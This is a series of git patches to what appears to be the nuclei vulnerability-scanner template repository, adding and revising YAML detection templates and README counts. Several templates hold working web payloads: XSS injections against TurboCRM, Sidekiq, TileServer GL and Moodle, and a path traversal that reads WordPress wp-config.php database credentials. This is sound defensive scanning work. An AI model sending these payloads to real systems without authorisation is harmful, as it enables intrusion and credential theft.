---- From 3cd11581b9bc561ecf9d0b275911e15ba58e6a71 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 23:48:26 +0530 Subject: [PATCH 39/79] readme update --- .github/scripts/README.tmpl | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/scripts/README.tmpl b/.github/scripts/README.tmpl index c359879dd6..b2355df298 100644 --- a/.github/scripts/README.tmpl +++ b/.github/scripts/README.tmpl @@ -18,7 +18,8 @@ Nuclei Templates ContributionsDiscussionCommunity • - Join Discord + FAQs • + Join Discord

---- From 8a5fb193ff7387dcca2ae72c90fd4aa36d60648f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 8 Apr 2021 18:19:00 +0000 Subject: [PATCH 40/79] Auto Update README [Thu Apr 8 18:19:00 UTC 2021] :robot: --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index ea76460bcb..581d4ef04a 100644 --- a/README.md +++ b/README.md @@ -18,7 +18,8 @@ Nuclei Templates ContributionsDiscussionCommunity • - Join Discord + FAQs • + Join Discord

---- From 0b746c97c23c5f02de9b9c117e47a0af7935a2fc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 9 Apr 2021 13:13:36 +0530 Subject: [PATCH 41/79] Added additional check to avoid possible false positive --- cves/2018/CVE-2018-0101.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0101.yaml b/cves/2018/CVE-2018-0101.yaml index 8448e3c2f6..f92d64a488 100644 --- a/cves/2018/CVE-2018-0101.yaml +++ b/cves/2018/CVE-2018-0101.yaml @@ -35,6 +35,11 @@ requests: A + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + req-condition: true matchers-condition: and matchers: @@ -49,4 +54,9 @@ requests: - "status_code_2 == 502" - "status_code_2 == 503" - "status_code_2 == 504" - condition: or \ No newline at end of file + condition: or + + - type: dsl + dsl: + - "status_code_3 == 200" + negative: true \ No newline at end of file From d605f09072fedadea6205765e063213f469793a5 Mon Sep 17 00:00:00 2001 From: Khaled Mohamed <46958133+xElkomy@users.noreply.github.com> Date: Fri, 9 Apr 2021 13:51:58 +0200 Subject: [PATCH 42/79] Create varnish-cache.yaml --- vulnerabilities/varnish-cache.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 vulnerabilities/varnish-cache.yaml diff --git a/vulnerabilities/varnish-cache.yaml b/vulnerabilities/varnish-cache.yaml new file mode 100644 index 0000000000..3188c09dbe --- /dev/null +++ b/vulnerabilities/varnish-cache.yaml @@ -0,0 +1,17 @@ +id: vanish-detect +info: + name: Vanish Cache Detection + author: 0xelkomy + severity: low + # https://stackoverflow.com/questions/41480688/what-is-the-difference-between-bans-and-purge-in-varnish-http-cache +requests: + - raw: + - | + PURGE / HTTP/1.1 + + matchers: + - type: dsl + name: multi-req + dsl: + - 'contains(body_1, "200 Purged") == true' + req-condition: true From a42a6fac90dffa3f34d0f83603e71f95d3e5457c Mon Sep 17 00:00:00 2001 From: Khaled Mohamed <46958133+xElkomy@users.noreply.github.com> Date: Fri, 9 Apr 2021 13:54:40 +0200 Subject: [PATCH 43/79] Update varnish-cache.yaml --- vulnerabilities/varnish-cache.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/varnish-cache.yaml b/vulnerabilities/varnish-cache.yaml index 3188c09dbe..2a83f05ffd 100644 --- a/vulnerabilities/varnish-cache.yaml +++ b/vulnerabilities/varnish-cache.yaml @@ -3,7 +3,6 @@ info: name: Vanish Cache Detection author: 0xelkomy severity: low - # https://stackoverflow.com/questions/41480688/what-is-the-difference-between-bans-and-purge-in-varnish-http-cache requests: - raw: - | From ab46a9b2f0feba9f566793124626f4a224c25e40 Mon Sep 17 00:00:00 2001 From: Gal Nagli <35578316+NagliNagli@users.noreply.github.com> Date: Sat, 10 Apr 2021 01:01:09 +0300 Subject: [PATCH 44/79] Update basic-cors.yaml Severity should be info. --- vulnerabilities/generic/basic-cors.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index 7c57f945b8..a224186e83 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -3,7 +3,7 @@ id: basic-cors-misconfig info: name: Basic CORS misconfiguration author: nadino - severity: low + severity: info tags: cors requests: From 8e5c1150a84973880c9756355889c87e6e8471c5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 10 Apr 2021 03:49:09 +0530 Subject: [PATCH 45/79] Update CVE-2019-18394.yaml --- cves/2019/CVE-2019-18394.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-18394.yaml b/cves/2019/CVE-2019-18394.yaml index 9a0e8d64af..5bd99f4581 100644 --- a/cves/2019/CVE-2019-18394.yaml +++ b/cves/2019/CVE-2019-18394.yaml @@ -2,7 +2,7 @@ id: CVE-2019-18394 info: name: Openfire Full Read SSRF - author: pdteam - nuclei.projectdiscovery.io + author: pdteam severity: critical description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests. refrense: | @@ -17,4 +17,4 @@ requests: matchers: - type: word words: - -

Burp Collaborator Server

\ No newline at end of file + -

Burp Collaborator Server

From b36ec072d625312923cf38d60795f0e2d7805a7e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 10 Apr 2021 13:10:29 +0530 Subject: [PATCH 46/79] template update --- .nuclei-ignore | 1 + vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml | 4 ++-- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/.nuclei-ignore b/.nuclei-ignore index 32e6f022f1..207ece0f9c 100644 --- a/.nuclei-ignore +++ b/.nuclei-ignore @@ -13,6 +13,7 @@ tags: - "iot" - "misc" - "fuzz" + - "revision" # files is a list of files to ignore template execution # unless asked for by the user. \ No newline at end of file diff --git a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml b/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml index 3b5133b47f..00843f0d3f 100644 --- a/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml +++ b/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml @@ -5,13 +5,13 @@ info: author: aceseven (digisec360) description: Cross-site Scripting in moodle jitsi plugin severity: medium - tags: moodle,jitsi,xss + tags: moodle,jitsi,xss,revision reference: https://github.com/udima-university/moodle-mod_jitsi/issues/67 requests: - method: GET path: - - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" + - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1" matchers-condition: and matchers: From e176461addc846b3ef9d4c00be5a2881b629b310 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 10 Apr 2021 13:32:24 +0000 Subject: [PATCH 47/79] Create laravel-telescope.yaml --- exposures/logs/laravel-telescope.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposures/logs/laravel-telescope.yaml diff --git a/exposures/logs/laravel-telescope.yaml b/exposures/logs/laravel-telescope.yaml new file mode 100644 index 0000000000..01854df18c --- /dev/null +++ b/exposures/logs/laravel-telescope.yaml @@ -0,0 +1,24 @@ +id: laravel-telescope + +info: + name: Laravel Telescope Disclosure + author: geeknik + description: Telescope provides insight into the requests coming into your application, exceptions, log entries, database queries, queued jobs, mail, notifications, cache operations, scheduled tasks, variable dumps, and more. + reference: https://laravel.com/docs/8.x/telescope + severity: medium + tags: laravel,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/telescope/requests" + + redirects: true + matchers: + - type: word + words: + - "Telescope" + - "Requests" + - "Commands" + - "Schedule" + condition: and From e87a0671ee6e2911430cbdf3ff1f580cad636084 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 22:58:27 +0530 Subject: [PATCH 48/79] Create CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-30151.yaml diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml new file mode 100644 index 0000000000..ece49be0ea --- /dev/null +++ b/cves/2021/CVE-2021-30151.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-30151 + +info: + name: CVE-2021-30151 + author: DhiyaneshDk + severity: low + description: | + Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + reference: | + - https://github.com/mperham/sidekiq/issues/4852 + - + tags: cve,cve2021,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert('nuclei')"' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "onmouseover="alert('nuclei')" + - type: word + part: header + words: + - "text/html" From 3e3db1c972df90dcec41f4767ab5335c5e618492 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:37:38 +0530 Subject: [PATCH 49/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index ece49be0ea..05462a7be6 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -8,7 +8,7 @@ info: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - - + - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 tags: cve,cve2021,xss requests: From 1e0b6ea3839c5c2487d8865aec6030e02531ee46 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:43:37 +0530 Subject: [PATCH 50/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 05462a7be6..b9f5a033f8 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -14,7 +14,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert('nuclei')"' + - '{{BaseURL}}/sidekiq/queues/%22onmouseover%3D%22alert(%27nuclei%27)%22' matchers-condition: and matchers: From 1692ef18218026572b5566e1427cbaf7cb257677 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 10 Apr 2021 23:47:02 +0530 Subject: [PATCH 51/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index b9f5a033f8..0fed61b3c7 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -14,8 +14,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/sidekiq/queues/%22onmouseover%3D%22alert(%27nuclei%27)%22' - + - '{{BaseURL}}/sidekiq/queues/"onmouseover="alert(nuclei)"' matchers-condition: and matchers: - type: word From 4c9cbc169234a9dabc65b0a370ecc277194b4cc9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Apr 2021 00:57:38 +0530 Subject: [PATCH 52/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 0fed61b3c7..4f78422672 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDk severity: low description: | - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 From 43e59a577e16769d0809b2fd9c06eac6924dbda4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 11 Apr 2021 01:00:49 +0530 Subject: [PATCH 53/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index 4f78422672..f9fc1c8820 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -4,8 +4,7 @@ info: name: CVE-2021-30151 author: DhiyaneshDk severity: low - description: | - - Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. + description: Sidekiq through 5.1.3 and 6.x through 6.2.0 allows XSS via the queue name of the live-poll feature when Internet Explorer is used. reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 @@ -20,7 +19,7 @@ requests: - type: word part: body words: - - "onmouseover="alert('nuclei')" + - "onmouseover=\"alert('nuclei')" - type: word part: header words: From cdac8b34a6470d52ccd884d9bf0fd990b6852c30 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 11 Apr 2021 00:22:56 +0000 Subject: [PATCH 54/79] Create turbocrm-xss.yaml --- vulnerabilities/other/turbocrm-xss.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/other/turbocrm-xss.yaml diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml new file mode 100644 index 0000000000..ade2003039 --- /dev/null +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -0,0 +1,25 @@ +id: turbocrm-xss + +info: + name: TurboCRM XSS + author: pikpikcu + severity: medium + reference: https://gist.github.com/pikpikcu/9689c5220abbe04d4927ffa660241b4a + tags: xss,turbocrm + +requests: + - method: GET + path: + - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E' + + matchers-condition: and + matchers: + + - type: word + words: + - '">' + part: body + + - type: status + status: + - 200 From b0595790cb86458f037e37d7077ad237e844f430 Mon Sep 17 00:00:00 2001 From: LuskaBol <73140480+LuskaBol@users.noreply.github.com> Date: Sat, 10 Apr 2021 22:27:51 -0300 Subject: [PATCH 55/79] Rename vulnerabilities/rockethcat/unauth-message-read.yaml to vulnerabilities/rocketchat/unauth-message-read.yaml --- .../{rockethcat => rocketchat}/unauth-message-read.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename vulnerabilities/{rockethcat => rocketchat}/unauth-message-read.yaml (98%) diff --git a/vulnerabilities/rockethcat/unauth-message-read.yaml b/vulnerabilities/rocketchat/unauth-message-read.yaml similarity index 98% rename from vulnerabilities/rockethcat/unauth-message-read.yaml rename to vulnerabilities/rocketchat/unauth-message-read.yaml index 8b782186a1..981b5ee0e5 100644 --- a/vulnerabilities/rockethcat/unauth-message-read.yaml +++ b/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -45,4 +45,4 @@ requests: - '"{\"msg\":\"result\",\"result\":{\"messages\"' - '"success":true' part: body - condition: and \ No newline at end of file + condition: and From a4ffb88b17e5692e638c24a29a33dc0457775dd1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 15:49:26 +0530 Subject: [PATCH 56/79] Added CVE-2018-7422 --- cves/2018/CVE-2018-7422.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-7422.yaml diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml new file mode 100644 index 0000000000..0662aac51c --- /dev/null +++ b/cves/2018/CVE-2018-7422.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-7422 + +info: + name: WordPress Site Editor Plugin LFI + author: LuskaBol + severity: high + tags: cve,cve2018,wordpress,wp-plugin,lfi + description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + reference: https://www.exploit-db.com/exploits/44340 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From b5dab216c57760589ed16e8f6a34a5f960372d54 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 15:50:35 +0530 Subject: [PATCH 57/79] wp workflow update --- workflows/wordpress-workflow.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 48e27c3964..a81be966be 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml @@ -14,6 +14,7 @@ workflows: - template: cves/2016/CVE-2016-10033.yaml - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml + - template: cves/2018/CVE-2018-7422.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml - template: cves/2019/CVE-2019-9978.yaml From 2c0574af170ddb4e0798d626f81f0fc94d5091c9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 10:22:51 +0000 Subject: [PATCH 58/79] Auto Update README [Sun Apr 11 10:22:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 581d4ef04a..a6dafc8f94 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 267 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 268 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 921 files**. +**95 directories, 922 files**. From b05c8f402b8fca1bc26bad5665e2b80ebae76240 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 16:12:21 +0530 Subject: [PATCH 59/79] Added CVE-2020-15500 --- cves/2020/CVE-2020-15500.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2020/CVE-2020-15500.yaml diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml new file mode 100644 index 0000000000..6a0066e483 --- /dev/null +++ b/cves/2020/CVE-2020-15500.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-15500 + +info: + name: TileServer GL Reflected XSS + author: Akash.C + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + source: https://github.com/maptiler/tileserver-gl/issues/461 + tags: cve,cve2020,xss,tileserver + +requests: + - method: GET + path: + - '{{BaseURL}}/?key=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "text/html" + + - type: word + words: + part: body + - '">' \ No newline at end of file From 5b6d64d13f2aaf331afbfc96fb42659bb3880cf2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 10:44:03 +0000 Subject: [PATCH 60/79] Auto Update README [Sun Apr 11 10:44:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index a6dafc8f94..7fa4c82f8b 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 268 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 269 | vulnerabilities | 120 | exposed-panels | 118 | | takeovers | 67 | exposures | 69 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 922 files**. +**95 directories, 923 files**. From 45197abd9651660820fdff54ca8daaa999736a4e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 16:23:53 +0530 Subject: [PATCH 61/79] Added access-log-file --- exposures/logs/access-log.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/logs/access-log.yaml diff --git a/exposures/logs/access-log.yaml b/exposures/logs/access-log.yaml new file mode 100644 index 0000000000..bb9debe657 --- /dev/null +++ b/exposures/logs/access-log.yaml @@ -0,0 +1,27 @@ +id: access-log-file + +info: + name: Publicly accessible access-log file + author: sheikhrishad + severity: low + tags: log + +requests: + - method: GET + path: + - "{{BaseURL}}/access.log" + + matchers-condition: and + matchers: + - type: word + words: + - '"GET /' + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From cfa8cbfb206100a93c677bd4043a0df04da4b6ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 10:57:26 +0000 Subject: [PATCH 62/79] Auto Update README [Sun Apr 11 10:57:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7fa4c82f8b..f0bf0d4e85 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 269 | vulnerabilities | 120 | exposed-panels | 118 | -| takeovers | 67 | exposures | 69 | technologies | 60 | +| takeovers | 67 | exposures | 70 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 923 files**. +**95 directories, 924 files**. From 862862f27708cfd07721b0a48f1b20f66244f8db Mon Sep 17 00:00:00 2001 From: Chintan Gurjar Date: Sun, 11 Apr 2021 12:37:22 +0100 Subject: [PATCH 63/79] Removed blank lines --- default-logins/nagios/nagios-default-credential.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/default-logins/nagios/nagios-default-credential.yaml b/default-logins/nagios/nagios-default-credential.yaml index 998433526c..e582f205aa 100644 --- a/default-logins/nagios/nagios-default-credential.yaml +++ b/default-logins/nagios/nagios-default-credential.yaml @@ -1,12 +1,10 @@ id: nagios-default-credentials - info: name: Nagios Default Credentials Check author: iamthefrogy severity: high tags: nagios,default-login reference: https://www.nagios.org - requests: - method: GET path: @@ -23,4 +21,4 @@ requests: words: - 'Current Status' - 'Reports' - condition: and \ No newline at end of file + condition: and From d96746d1937e0424181f6e66cc1ef77c7962df5b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 17:24:54 +0530 Subject: [PATCH 64/79] minor update --- vulnerabilities/other/turbocrm-xss.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml index ade2003039..88e7d47165 100644 --- a/vulnerabilities/other/turbocrm-xss.yaml +++ b/vulnerabilities/other/turbocrm-xss.yaml @@ -10,16 +10,21 @@ info: requests: - method: GET path: - - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&orgcode=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E&loginname=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E' + - '{{BaseURL}}/login/forgetpswd.php?loginsys=1&loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' matchers-condition: and matchers: - type: word words: - - '">' + - '">' part: body + - type: word + part: header + words: + - "text/html" + - type: status status: - - 200 + - 200 \ No newline at end of file From 9ebc28ced9cf0d7b5123293d672131bfe5857b14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 11:56:05 +0000 Subject: [PATCH 65/79] Auto Update README [Sun Apr 11 11:56:05 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f0bf0d4e85..f9e39eb183 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 269 | vulnerabilities | 120 | exposed-panels | 118 | +| cves | 269 | vulnerabilities | 121 | exposed-panels | 118 | | takeovers | 67 | exposures | 70 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 924 files**. +**95 directories, 925 files**. From b0b45dd599b81dc911385c94ab87051eb0202e2a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 11 Apr 2021 17:51:41 +0530 Subject: [PATCH 66/79] Update CVE-2021-30151.yaml --- cves/2021/CVE-2021-30151.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-30151.yaml b/cves/2021/CVE-2021-30151.yaml index f9fc1c8820..9f93b76ad6 100644 --- a/cves/2021/CVE-2021-30151.yaml +++ b/cves/2021/CVE-2021-30151.yaml @@ -8,7 +8,7 @@ info: reference: | - https://github.com/mperham/sidekiq/issues/4852 - https://nvd.nist.gov/vuln/detail/CVE-2021-30151 - tags: cve,cve2021,xss + tags: cve,cve2021,xss,sidekiq requests: - method: GET @@ -20,7 +20,12 @@ requests: part: body words: - "onmouseover=\"alert('nuclei')" + - type: word part: header words: - "text/html" + + - type: status + status: + - 200 \ No newline at end of file From 609e54c116ded37fb155473a9db6b2cd7baa88e9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 11 Apr 2021 12:26:12 +0000 Subject: [PATCH 67/79] Auto Update README [Sun Apr 11 12:26:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f9e39eb183..d048ef4341 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 269 | vulnerabilities | 121 | exposed-panels | 118 | +| cves | 270 | vulnerabilities | 121 | exposed-panels | 118 | | takeovers | 67 | exposures | 70 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 33 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**95 directories, 925 files**. +**95 directories, 926 files**. From f691f574d6375c09f36e7a6ed57799def579db51 Mon Sep 17 00:00:00 2001 From: Chintan Gurjar Date: Sun, 11 Apr 2021 14:02:20 +0100 Subject: [PATCH 68/79] detect openssh5.3 --- network/openssh5.3-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 network/openssh5.3-detect.yaml diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml new file mode 100644 index 0000000000..ac9f67fc5b --- /dev/null +++ b/network/openssh5.3-detect.yaml @@ -0,0 +1,23 @@ +id: OpenSSH-5.3-detect + +info: + name: OpenSSH 5.3 Detection + author: iamthefrogy + severity: low + tags: network, openssh + + + +# OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities with below 2 CVEs +# -------------------------------------------------------------------------------------------- +# 